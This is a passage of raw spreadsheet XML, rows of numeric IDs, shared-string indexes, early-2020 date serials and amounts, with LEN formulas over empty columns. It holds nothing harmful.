      </c>
      <c r="H1823">
        <v>100000</v>
      </c>
      <c r="K1823">
        <f>LEN(I1823)</f>
        <v>0</v>
      </c>
      <c r="L1823">
        <f>LEN(J1823)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1824" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1824">
        <v>18091</v>
      </c>
      <c r="B1824">
        <v>2078</v>
      </c>
      <c r="C1824" t="s">
        <v>6749</v>
      </c>
      <c r="D1824" t="s">
        <v>9829</v>
      </c>
      <c r="E1824">
        <v>26</v>
      </c>
      <c r="F1824" t="s">
        <v>3204</v>
      </c>
      <c r="G1824" s="1">
        <v>43852</v>
      </c>
      <c r="H1824">
        <v>8000</v>
      </c>
      <c r="K1824">
        <f>LEN(I1824)</f>
        <v>0</v>
      </c>
      <c r="L1824">
        <f>LEN(J1824)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1825" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1825">
        <v>18189</v>
      </c>
      <c r="B1825">
        <v>1691</v>
      </c>
      <c r="C1825" t="s">
        <v>2588</v>
      </c>
      <c r="D1825" t="s">
        <v>9830</v>
      </c>
      <c r="E1825">
        <v>26</v>
      </c>
      <c r="F1825" t="s">
        <v>9533</v>
      </c>
      <c r="G1825" s="1">
        <v>43858</v>
      </c>
      <c r="H1825">
        <v>324</v>
      </c>
      <c r="K1825">
        <f>LEN(I1825)</f>
        <v>0</v>
      </c>
      <c r="L1825">
        <f>LEN(J1825)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1826" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1826">
        <v>18190</v>
      </c>
      <c r="B1826">
        <v>1691</v>
      </c>
      <c r="C1826" t="s">
        <v>2588</v>
      </c>
      <c r="D1826" t="s">
        <v>9830</v>
      </c>
      <c r="E1826">
        <v>26</v>
      </c>
      <c r="F1826" t="s">
        <v>9681</v>
      </c>
      <c r="G1826" s="1">
        <v>43858</v>
      </c>
      <c r="H1826">
        <v>324</v>
      </c>
      <c r="K1826">
        <f>LEN(I1826)</f>
        <v>0</v>
      </c>
      <c r="L1826">
        <f>LEN(J1826)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1827" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1827">
        <v>18271</v>
      </c>
      <c r="B1827">
        <v>2076</v>
      </c>
      <c r="C1827" t="s">
        <v>6742</v>
      </c>
      <c r="D1827" t="s">
        <v>9835</v>
      </c>
      <c r="E1827">
        <v>11</v>
      </c>
      <c r="F1827" t="s">
        <v>9454</v>
      </c>
      <c r="G1827" s="1">
        <v>43964</v>
      </c>
      <c r="H1827">
        <v>10000</v>
      </c>
      <c r="K1827">
        <f>LEN(I1827)</f>
        <v>0</v>
      </c>
      <c r="L1827">
        <f>LEN(J1827)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1828" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1828">
        <v>18272</v>
      </c>
      <c r="B1828">
        <v>2076</v>
      </c>
      <c r="C1828" t="s">
        <v>6742</v>
      </c>
      <c r="D1828" t="s">
        <v>9835</v>
      </c>
      <c r="E1828">
        <v>11</v>
      </c>
      <c r="F1828" t="s">
        <v>512</v>
      </c>
      <c r="G1828" s="1">
        <v>43964</v>
      </c>
      <c r="H1828">
        <v>10000</v>
      </c>
      <c r="K1828">
        <f>LEN(I1828)</f>
        <v>0</v>
      </c>
      <c r="L1828">
        <f>LEN(J1828)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1829" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1829">
        <v>18273</v>
      </c>
      <c r="B1829">
        <v>2076</v>
      </c>
      <c r="C1829" t="s">
        <v>6742</v>
      </c>
      <c r="D1829" t="s">
        <v>9835</v>
      </c>
      <c r="E1829">
        <v>11</v>
      </c>
      <c r="F1829" t="s">
        <v>9217</v>
      </c>
      <c r="G1829" s="1">
        <v>43964</v>
      </c>
      <c r="H1829">
        <v>10000</v>
      </c>
      <c r="K1829">
        <f>LEN(I1829)</f>
        <v>0</v>
      </c>
      <c r="L1829">
        <f>LEN(J1829)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1830" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1830">
        <v>18364</v>
      </c>
      <c r="B1830">
        <v>114</v>
      </c>
      <c r="C1830" t="s">
        <v>298</v>
      </c>
      <c r="D1830" t="s">
        <v>9842</v>
      </c>
      <c r="E1830">
        <v>12</v>
      </c>
      <c r="F1830" t="s">
        <v>9577</v>
      </c>
      <c r="G1830" s="1">
        <v>43836</v>
      </c>
      <c r="H1830">
        <v>10000</v>
      </c>
      <c r="K1830">
        <f>LEN(I1830)</f>
        <v>0</v>
      </c>
      <c r="L1830">
        <f>LEN(J1830)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1831" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1831">
        <v>18365</v>
      </c>
      <c r="B1831">
        <v>114</v>
      </c>
      <c r="C1831" t="s">
        <v>298</v>
      </c>
      <c r="D1831" t="s">
        <v>9842</v>
      </c>
      <c r="E1831">
        <v>12</v>
      </c>
      <c r="F1831" t="s">
        <v>9435</v>
      </c>
      <c r="G1831" s="1">
        <v>43836</v>
      </c>
      <c r="H1831">
        <v>100000</v>
      </c>
      <c r="K1831">
        <f>LEN(I1831)</f>
        <v>0</v>
      </c>
      <c r="L1831">
        <f>LEN(J1831)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1832" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1832">
        <v>18366</v>
      </c>
      <c r="B1832">
        <v>114</v>
      </c>
      <c r="C1832" t="s">
        <v>298</v>
      </c>
      <c r="D1832" t="s">
        <v>9842</v>
      </c>
      <c r="E1832">
        <v>12</v>
      </c>
      <c r="F1832" t="s">
        <v>9843</v>
      </c>
      <c r="G1832" s="1">
        <v>43836</v>
      </c>
      <c r="H1832">
        <v>10000</v>
      </c>
      <c r="K1832">
        <f>LEN(I1832)</f>
        <v>0</v>
      </c>
      <c r="L1832">
        <f>LEN(J1832)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1833" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1833">
        <v>18367</v>
      </c>
      <c r="B1833">
        <v>114</v>
      </c>
      <c r="C1833" t="s">
        <v>298</v>
      </c>
      <c r="D1833" t="s">
        <v>9842</v>
      </c>
      <c r="E1833">
        <v>12</v>
      </c>
      <c r="F1833" t="s">
        <v>9844</v>
      </c>
      <c r="G1833" s="1">
        <v>43836</v>
      </c>
      <c r="H1833">
        <v>100000</v>
      </c>
      <c r="K1833">
        <f>LEN(I1833)</f>
        <v>0</v>
      </c>
      <c r="L1833">
        <f>LEN(J1833)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1834" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1834">
        <v>18370</v>
      </c>
      <c r="B1834">
        <v>2390</v>
      </c>
      <c r="C1834" t="s">
        <v>5376</v>
      </c>
      <c r="D1834" t="s">
        <v>9821</v>
      </c>
      <c r="E1834">
        <v>12</v>
      </c>
      <c r="F1834" t="s">
        <v>1030</v>
      </c>
      <c r="G1834" s="1">
        <v>43873</v>
      </c>
      <c r="H1834">
        <v>100000</v>
      </c>
      <c r="K1834">
        <f>LEN(I1834)</f>
        <v>0</v>
      </c>
      <c r="L1834">
        <f>LEN(J1834)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1835" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1835">
        <v>18377</v>
      </c>
      <c r="B1835">
        <v>2390</v>
      </c>
      <c r="C1835" t="s">
        <v>5376</v>
      </c>
      <c r="D1835" t="s">
        <v>9821</v>
      </c>
      <c r="E1835">
        <v>12</v>
      </c>
      <c r="F1835" t="s">
        <v>9595</v>
      </c>
      <c r="G1835" s="1">
        <v>43873</v>
      </c>
      <c r="H1835">
        <v>100000</v>
      </c>
      <c r="K1835">
        <f>LEN(I1835)</f>
        <v>0</v>
      </c>
      <c r="L1835">
        <f>LEN(J1835)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1836" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1836">
        <v>18379</v>
      </c>
      <c r="B1836">
        <v>2390</v>
      </c>
      <c r="C1836" t="s">
        <v>5376</v>
      </c>
      <c r="D1836" t="s">
        <v>9821</v>
      </c>
      <c r="E1836">
        <v>12</v>
      </c>
      <c r="F1836" t="s">
        <v>7241</v>
      </c>
      <c r="G1836" s="1">
        <v>43873</v>
      </c>
      <c r="H1836">
        <v>100000</v>
      </c>
      <c r="K1836">
        <f>LEN(I1836)</f>
        <v>0</v>
      </c>
      <c r="L1836">
        <f>LEN(J1836)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1837" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1837">
        <v>18380</v>
      </c>
      <c r="B1837">
        <v>2390</v>
      </c>
      <c r="C1837" t="s">
        <v>5376</v>
      </c>
      <c r="D1837" t="s">
        <v>9821</v>
      </c>
      <c r="E1837">
        <v>12</v>
      </c>
      <c r="F1837" t="s">
        <v>4950</v>
      </c>
      <c r="G1837" s="1">
        <v>43873</v>
      </c>
      <c r="H1837">
        <v>100000</v>
      </c>
      <c r="K1837">
        <f>LEN(I1837)</f>
        <v>0</v>
      </c>
      <c r="L1837">
        <f>LEN(J1837)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1838" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1838">
        <v>18381</v>
      </c>
      <c r="B1838">
        <v>2390</v>
      </c>
      <c r="C1838" t="s">
        <v>5376</v>
      </c>
      <c r="D1838" t="s">
        <v>9821</v>
      </c>
      <c r="E1838">
        <v>12</v>
      </c>
      <c r="F1838" t="s">
        <v>9845</v>
      </c>
      <c r="G1838" s="1">
        <v>43873</v>
      </c>
      <c r="H1838">
        <v>100000</v>
      </c>
      <c r="K1838">
        <f>LEN(I1838)</f>
        <v>0</v>
      </c>
      <c r="L1838">
        <f>LEN(J1838)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1839" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1839">
        <v>18382</v>
      </c>
      <c r="B1839">
        <v>2390</v>
      </c>
      <c r="C1839" t="s">
        <v>5376</v>
      </c>
      <c r="D1839" t="s">
        <v>9821</v>
      </c>
      <c r="E1839">
        <v>12</v>
      </c>
      <c r="F1839" t="s">
        <v>9846</v>
      </c>
      <c r="G1839" s="1">
        <v>43873</v>
      </c>
      <c r="H1839">
        <v>100000</v>
      </c>
      <c r="K1839">
        <f>LEN(I1839)</f>
        <v>0</v>
      </c>
      <c r="L1839">
        <f>LEN(J1839)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1840" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1840">
        <v>18390</v>
      </c>
      <c r="B1840">
        <v>149</v>
      </c>
      <c r="C1840" t="s">
        <v>2286</v>
      </c>
      <c r="D1840" t="s">
        <v>9847</v>
      </c>
      <c r="E1840">
        <v>13</v>
      </c>
      <c r="F1840" t="s">
        <v>2288</v>
      </c>
      <c r="G1840" s="1">
        <v>44243</v>
      </c>
      <c r="H1840">
        <v>500</v>
      </c>
      <c r="K1840">
        <f>LEN(I1840)</f>
        <v>0</v>
      </c>
      <c r="L1840">
        <f>LEN(J1840)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1841" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1841">
        <v>18456</v>
      </c>
      <c r="B1841">
        <v>1160</v>
      </c>
      <c r="C1841" t="s">
        <v>2967</v>
      </c>
      <c r="D1841" t="s">
        <v>9848</v>
      </c>
      <c r="E1841">
        <v>16</v>
      </c>
      <c r="F1841" t="s">
        <v>2105</v>
      </c>
      <c r="G1841" s="1">
        <v>43909</v>
      </c>
      <c r="H1841">
        <v>3265000</v>
      </c>
      <c r="K1841">
        <f>LEN(I1841)</f>
        <v>0</v>
      </c>
      <c r="L1841">
        <f>LEN(J1841)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1842" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1842">
        <v>18530</v>
      </c>
      <c r="B1842">
        <v>2390</v>
      </c>
      <c r="C1842" t="s">
        <v>5376</v>
      </c>
      <c r="D1842" t="s">
        <v>9821</v>
      </c>
      <c r="E1842">
        <v>12</v>
      </c>
      <c r="F1842" t="s">
        <v>9722</v>
      </c>
      <c r="G1842" s="1">
        <v>43873</v>
      </c>
      <c r="H1842">
        <v>300000</v>
      </c>
      <c r="K1842">
        <f>LEN(I1842)</f>
        <v>0</v>
      </c>
      <c r="L1842">
        <f>LEN(J1842)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1843" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1843">
        <v>18531</v>
      </c>
      <c r="B1843">
        <v>2390</v>
      </c>
      <c r="C1843" t="s">
        <v>5376</v>
      </c>
      <c r="D1843" t="s">
        <v>9821</v>
      </c>
      <c r="E1843">
        <v>12</v>
      </c>
      <c r="F1843" t="s">
        <v>9849</v>
      </c>
      <c r="G1843" s="1">
        <v>43873</v>
      </c>
      <c r="H1843">
        <v>300000</v>
      </c>
      <c r="K1843">
        <f>LEN(I1843)</f>
        <v>0</v>
      </c>
      <c r="L1843">
        <f>LEN(J1843)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1844" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1844">
        <v>18532</v>
      </c>
      <c r="B1844">
        <v>2390</v>
      </c>
      <c r="C1844" t="s">
        <v>5376</v>
      </c>
      <c r="D1844" t="s">
        <v>9821</v>
      </c>
      <c r="E1844">
        <v>12</v>
      </c>
      <c r="F1844" t="s">
        <v>1746</v>
      </c>
      <c r="G1844" s="1">
        <v>43873</v>
      </c>
      <c r="H1844">
        <v>300000</v>
      </c>
      <c r="K1844">
        <f>LEN(I1844)</f>
        <v>0</v>
      </c>
      <c r="L1844">
        <f>LEN(J1844)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1845" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1845">
        <v>18533</v>
      </c>
      <c r="B1845">
        <v>2390</v>
      </c>
      <c r="C1845" t="s">
        <v>5376</v>
      </c>
      <c r="D1845" t="s">
        <v>9821</v>
      </c>
      <c r="E1845">
        <v>12</v>
      </c>
      <c r="F1845" t="s">
        <v>9435</v>
      </c>
      <c r="G1845" s="1">
        <v>43873</v>
      </c>
      <c r="H1845">
        <v>300000</v>
      </c>
      <c r="K1845">
        <f>LEN(I1845)</f>
        <v>0</v>
      </c>
      <c r="L1845">
        <f>LEN(J1845)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1846" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1846">
        <v>18852</v>
      </c>
      <c r="B1846">
        <v>175</v>
      </c>
      <c r="C1846" t="s">
        <v>335</v>
      </c>
      <c r="D1846" t="s">
        <v>9850</v>
      </c>
      <c r="E1846">
        <v>6</v>
      </c>
      <c r="F1846" t="s">
        <v>9676</v>
      </c>
      <c r="G1846" s="1">
        <v>43845</v>
      </c>
      <c r="H1846">
        <v>0</v>
      </c>
      <c r="K1846">
        <f>LEN(I1846)</f>
        <v>0</v>
      </c>
      <c r="L1846">
        <f>LEN(J1846)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1847" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1847">
        <v>18854</v>
      </c>
      <c r="B1847">
        <v>175</v>
      </c>
      <c r="C1847" t="s">
        <v>335</v>
      </c>
      <c r="D1847" t="s">
        <v>9850</v>
      </c>
      <c r="E1847">
        <v>6</v>
      </c>
      <c r="F1847" t="s">
        <v>9640</v>
      </c>
      <c r="G1847" s="1">
        <v>43845</v>
      </c>
      <c r="H1847">
        <v>300</v>
      </c>
      <c r="K1847">
        <f>LEN(I1847)</f>
        <v>0</v>
      </c>
      <c r="L1847">
        <f>LEN(J1847)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1848" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1848">
        <v>18855</v>
      </c>
      <c r="B1848">
        <v>175</v>
      </c>
      <c r="C1848" t="s">
        <v>335</v>
      </c>
      <c r="D1848" t="s">
        <v>9850</v>
      </c>
      <c r="E1848">
        <v>6</v>
      </c>
      <c r="F1848" t="s">
        <v>9590</v>
      </c>
      <c r="G1848" s="1">
        <v>43845</v>
      </c>
      <c r="H1848">
        <v>1000</v>
      </c>
      <c r="K1848">
        <f>LEN(I1848)</f>
        <v>0</v>
      </c>
      <c r="L1848">
        <f>LEN(J1848)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1849" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1849">
        <v>19254</v>
      </c>
      <c r="B1849">
        <v>958</v>
      </c>
      <c r="C1849" t="s">
        <v>2572</v>
      </c>
      <c r="D1849" t="s">
        <v>9575</v>
      </c>
      <c r="E1849">
        <v>16</v>
      </c>
      <c r="F1849" t="s">
        <v>9874</v>
      </c>
      <c r="G1849" s="1">
        <v>44182</v>
      </c>
      <c r="H1849">
        <v>0</v>
      </c>
      <c r="K1849">
        <f>LEN(I1849)</f>
        <v>0</v>
      </c>
      <c r="L1849">
        <f>LEN(J1849)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1850" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1850">
        <v>19323</v>
      </c>
      <c r="B1850">
        <v>455</v>
      </c>
      <c r="C1850" t="s">
        <v>272</v>
      </c>
      <c r="D1850" t="s">
        <v>9924</v>
      </c>
      <c r="E1850">
        <v>11</v>
      </c>
      <c r="F1850" t="s">
        <v>275</v>
      </c>
      <c r="G1850" s="1">
        <v>43875</v>
      </c>
      <c r="H1850">
        <v>250000</v>
      </c>
      <c r="K1850">
        <f>LEN(I1850)</f>
        <v>0</v>
      </c>
      <c r="L1850">
        <f>LEN(J1850)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1851" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1851">
        <v>19483</v>
      </c>
      <c r="B1851">
        <v>2066</v>
      </c>
      <c r="C1851" t="s">
        <v>4934</v>
      </c>
      <c r="D1851" t="s">
        <v>9431</v>
      </c>
      <c r="E1851">
        <v>17</v>
      </c>
      <c r="F1851" t="s">
        <v>10077</v>
      </c>
      <c r="G1851" s="1">
        <v>43851</v>
      </c>
      <c r="H1851">
        <v>1000</v>
      </c>
      <c r="K1851">
        <f>LEN(I1851)</f>
        <v>0</v>
      </c>
      <c r="L1851">
        <f>LEN(J1851)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1852" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1852">
        <v>19484</v>
      </c>
      <c r="B1852">
        <v>2066</v>
      </c>
      <c r="C1852" t="s">
        <v>4934</v>
      </c>
      <c r="D1852" t="s">
        <v>9431</v>
      </c>
      <c r="E1852">
        <v>17</v>
      </c>
      <c r="F1852" t="s">
        <v>10078</v>
      </c>
      <c r="G1852" s="1">
        <v>43851</v>
      </c>
      <c r="H1852">
        <v>20000</v>
      </c>
      <c r="K1852">
        <f>LEN(I1852)</f>
        <v>0</v>
      </c>
      <c r="L1852">
        <f>LEN(J1852)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1853" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1853">
        <v>19485</v>
      </c>
      <c r="B1853">
        <v>527</v>
      </c>
      <c r="C1853" t="s">
        <v>2456</v>
      </c>
      <c r="D1853" t="s">
        <v>9429</v>
      </c>
      <c r="E1853">
        <v>12</v>
      </c>
      <c r="F1853" t="s">
        <v>10079</v>
      </c>
      <c r="G1853" s="1">
        <v>43852</v>
      </c>
      <c r="H1853">
        <v>400</v>
      </c>
      <c r="K1853">
        <f>LEN(I1853)</f>
        <v>0</v>
      </c>
      <c r="L1853">
        <f>LEN(J1853)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1854" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1854">
        <v>19486</v>
      </c>
      <c r="B1854">
        <v>527</v>
      </c>
      <c r="C1854" t="s">
        <v>2456</v>
      </c>
      <c r="D1854" t="s">
        <v>9429</v>
      </c>
      <c r="E1854">
        <v>12</v>
      </c>
      <c r="F1854" t="s">
        <v>10080</v>
      </c>
      <c r="G1854" s="1">
        <v>43852</v>
      </c>
      <c r="H1854">
        <v>400</v>
      </c>
      <c r="K1854">
        <f>LEN(I1854)</f>
        <v>0</v>
      </c>
      <c r="L1854">
        <f>LEN(J1854)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1855" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1855">
        <v>19511</v>
      </c>
      <c r="B1855">
        <v>2608</v>
      </c>
      <c r="C1855" t="s">
        <v>5292</v>
      </c>
      <c r="D1855" t="s">
        <v>10088</v>
      </c>
      <c r="E1855">
        <v>2</v>
      </c>
      <c r="F1855" t="s">
        <v>10089</v>
      </c>
      <c r="G1855" s="1">
        <v>43861</v>
      </c>
      <c r="H1855">
        <v>30000</v>
      </c>
      <c r="K1855">
        <f>LEN(I1855)</f>
        <v>0</v>
      </c>
      <c r="L1855">
        <f>LEN(J1855)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1856" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1856">
        <v>19614</v>
      </c>
      <c r="B1856">
        <v>159</v>
      </c>
      <c r="C1856" t="s">
        <v>109</v>
      </c>
      <c r="D1856" t="s">
        <v>10129</v>
      </c>
      <c r="E1856">
        <v>12</v>
      </c>
      <c r="F1856" t="s">
        <v>10130</v>
      </c>
      <c r="G1856" s="1">
        <v>43847</v>
      </c>
      <c r="H1856">
        <v>129098</v>
      </c>
      <c r="K1856">
        <f>LEN(I1856)</f>
        <v>0</v>
      </c>
      <c r="L1856">
        <f>LEN(J1856)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1857" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1857">
        <v>19615</v>
      </c>
      <c r="B1857">
        <v>159</v>
      </c>
      <c r="C1857" t="s">
        <v>109</v>
      </c>
      <c r="D1857" t="s">
        <v>10129</v>
      </c>
      <c r="E1857">
        <v>12</v>
      </c>
      <c r="F1857" t="s">
        <v>9681</v>
      </c>
      <c r="G1857" s="1">
        <v>43847</v>
      </c>
      <c r="H1857">
        <v>1743</v>
      </c>
      <c r="K1857">
        <f>LEN(I1857)</f>
        <v>0</v>
      </c>
      <c r="L1857">
        <f>LEN(J1857)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1858" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1858">
        <v>19646</v>
      </c>
      <c r="B1858">
        <v>2066</v>
      </c>
      <c r="C1858" t="s">
        <v>4934</v>
      </c>
      <c r="D1858" t="s">
        <v>9431</v>
      </c>
      <c r="E1858">
        <v>17</v>
      </c>
      <c r="F1858" t="s">
        <v>9450</v>
      </c>
      <c r="G1858" s="1">
        <v>43851</v>
      </c>
      <c r="H1858">
        <v>20000</v>
      </c>
      <c r="K1858">
        <f>LEN(I1858)</f>
        <v>0</v>
      </c>
      <c r="L1858">
        <f>LEN(J1858)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1859" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1859">
        <v>19754</v>
      </c>
      <c r="B1859">
        <v>2323</v>
      </c>
      <c r="C1859" t="s">
        <v>5315</v>
      </c>
      <c r="D1859" t="s">
        <v>10220</v>
      </c>
      <c r="E1859">
        <v>5</v>
      </c>
      <c r="F1859" t="s">
        <v>3814</v>
      </c>
      <c r="G1859" s="1">
        <v>43879</v>
      </c>
      <c r="H1859">
        <v>40000</v>
      </c>
      <c r="K1859">
        <f>LEN(I1859)</f>
        <v>0</v>
      </c>
      <c r="L1859">
        <f>LEN(J1859)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1860" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1860">
        <v>19775</v>
      </c>
      <c r="B1860">
        <v>2546</v>
      </c>
      <c r="C1860" t="s">
        <v>5339</v>
      </c>
      <c r="D1860" t="s">
        <v>10229</v>
      </c>
      <c r="E1860">
        <v>5</v>
      </c>
      <c r="F1860" t="s">
        <v>10223</v>
      </c>
      <c r="G1860" s="1">
        <v>43896</v>
      </c>
      <c r="H1860">
        <v>20000</v>
      </c>
      <c r="K1860">
        <f>LEN(I1860)</f>
        <v>0</v>
      </c>
      <c r="L1860">
        <f>LEN(J1860)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1861" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1861">
        <v>19776</v>
      </c>
      <c r="B1861">
        <v>2546</v>
      </c>
      <c r="C1861" t="s">
        <v>5339</v>
      </c>
      <c r="D1861" t="s">
        <v>10229</v>
      </c>
      <c r="E1861">
        <v>5</v>
      </c>
      <c r="F1861" t="s">
        <v>3814</v>
      </c>
      <c r="G1861" s="1">
        <v>43896</v>
      </c>
      <c r="H1861">
        <v>10000</v>
      </c>
      <c r="K1861">
        <f>LEN(I1861)</f>
        <v>0</v>
      </c>
      <c r="L1861">
        <f>LEN(J1861)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1862" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1862">
        <v>19871</v>
      </c>
      <c r="B1862">
        <v>290</v>
      </c>
      <c r="C1862" t="s">
        <v>98</v>
      </c>
      <c r="D1862" t="s">
        <v>10292</v>
      </c>
      <c r="E1862">
        <v>12</v>
      </c>
      <c r="F1862" t="s">
        <v>10294</v>
      </c>
      <c r="G1862" s="1">
        <v>43892</v>
      </c>
      <c r="H1862">
        <v>8000</v>
      </c>
      <c r="K1862">
        <f>LEN(I1862)</f>
        <v>0</v>
      </c>
      <c r="L1862">
        <f>LEN(J1862)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1863" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1863">
        <v>19872</v>
      </c>
      <c r="B1863">
        <v>290</v>
      </c>
      <c r="C1863" t="s">
        <v>98</v>
      </c>
      <c r="D1863" t="s">
        <v>10292</v>
      </c>
      <c r="E1863">
        <v>12</v>
      </c>
      <c r="F1863" t="s">
        <v>9595</v>
      </c>
      <c r="G1863" s="1">
        <v>43892</v>
      </c>
      <c r="H1863">
        <v>700</v>
      </c>
      <c r="K1863">
        <f>LEN(I1863)</f>
        <v>0</v>
      </c>
      <c r="L1863">
        <f>LEN(J1863)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1864" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1864">
        <v>19873</v>
      </c>
      <c r="B1864">
        <v>290</v>
      </c>
      <c r="C1864" t="s">
        <v>98</v>
      </c>
      <c r="D1864" t="s">
        <v>10292</v>
      </c>
      <c r="E1864">
        <v>12</v>
      </c>
      <c r="F1864" t="s">
        <v>1746</v>
      </c>
      <c r="G1864" s="1">
        <v>43892</v>
      </c>
      <c r="H1864">
        <v>600</v>
      </c>
      <c r="K1864">
        <f>LEN(I1864)</f>
        <v>0</v>
      </c>
      <c r="L1864">
        <f>LEN(J1864)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1865" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1865">
        <v>19874</v>
      </c>
      <c r="B1865">
        <v>290</v>
      </c>
      <c r="C1865" t="s">
        <v>98</v>
      </c>
      <c r="D1865" t="s">
        <v>10292</v>
      </c>
      <c r="E1865">
        <v>12</v>
      </c>
      <c r="F1865" t="s">
        <v>10295</v>
      </c>
      <c r="G1865" s="1">
        <v>43892</v>
      </c>
      <c r="H1865">
        <v>1000</v>
      </c>
      <c r="K1865">
        <f>LEN(I1865)</f>
        <v>0</v>
      </c>
      <c r="L1865">
        <f>LEN(J1865)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1866" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1866">
        <v>19944</v>
      </c>
      <c r="B1866">
        <v>2331</v>
      </c>
      <c r="C1866" t="s">
        <v>5205</v>
      </c>
      <c r="D1866" t="s">
        <v>10099</v>
      </c>
      <c r="E1866">
        <v>26</v>
      </c>
      <c r="F1866" t="s">
        <v>10348</v>
      </c>
      <c r="G1866" s="1">
        <v>43909</v>
      </c>
      <c r="H1866">
        <v>2500</v>
      </c>
      <c r="K1866">
        <f>LEN(I1866)</f>
        <v>0</v>
      </c>
      <c r="L1866">
        <f>LEN(J1866)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1867" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1867">
        <v>19994</v>
      </c>
      <c r="B1867">
        <v>2308</v>
      </c>
      <c r="C1867" t="s">
        <v>5579</v>
      </c>
      <c r="D1867" t="s">
        <v>9584</v>
      </c>
      <c r="E1867">
        <v>29</v>
      </c>
      <c r="F1867" t="s">
        <v>3763</v>
      </c>
      <c r="G1867" s="1">
        <v>43985</v>
      </c>
      <c r="H1867">
        <v>0</v>
      </c>
      <c r="K1867">
        <f>LEN(I1867)</f>
        <v>0</v>
      </c>
      <c r="L1867">
        <f>LEN(J1867)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1868" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1868">
        <v>19995</v>
      </c>
      <c r="B1868">
        <v>2308</v>
      </c>
      <c r="C1868" t="s">
        <v>5579</v>
      </c>
      <c r="D1868" t="s">
        <v>9584</v>
      </c>
      <c r="E1868">
        <v>29</v>
      </c>
      <c r="F1868" t="s">
        <v>6917</v>
      </c>
      <c r="G1868" s="1">
        <v>43985</v>
      </c>
      <c r="H1868">
        <v>0</v>
      </c>
      <c r="K1868">
        <f>LEN(I1868)</f>
        <v>0</v>
      </c>
      <c r="L1868">
        <f>LEN(J1868)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1869" spans="1:12" x14ac:dyDescent="0.2">
